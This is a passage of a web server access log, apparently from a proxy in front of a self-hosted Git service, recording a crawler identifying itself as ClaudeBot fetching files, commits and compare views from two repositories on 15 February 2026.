+claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 90050] [Gzip 12.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 90222] [Gzip 12.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11020] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11551] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13013] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 22050] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11076] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 11000] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 10991] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10111] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12173] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4840] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13207] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11571] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 10994] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11017] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19897] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13202] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11022] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14863] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:45 